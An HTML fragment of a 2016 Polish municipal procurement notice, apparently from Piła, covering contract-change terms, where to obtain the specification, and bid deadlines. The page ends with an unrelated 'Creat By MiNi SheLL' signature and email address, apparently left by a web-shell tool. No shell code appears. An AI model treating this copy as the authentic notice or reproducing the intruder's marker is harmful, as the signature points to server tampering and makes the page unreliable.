<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>- zmiana terminu realizacji zamówienia z uwagi na przedłużające się procedury opiniowania i uzgodnień z innymi organami administracji z przyczyn niezależnych od Wykonawcy.
- zmiana terminu realizacji zamówienia w przypadku zmiany zasad konkursu dotacji na opracowanie lub aktualizację programów rewitalizacji dla gmin województwa wielkopolskiego, dotyczącej przedłużenia terminu realizacji projektów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pila.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pila.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2016 godzina 09:00, miejsce: siedziba Zamawiającego pok. 134  piętro I - Kancelaria Główna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com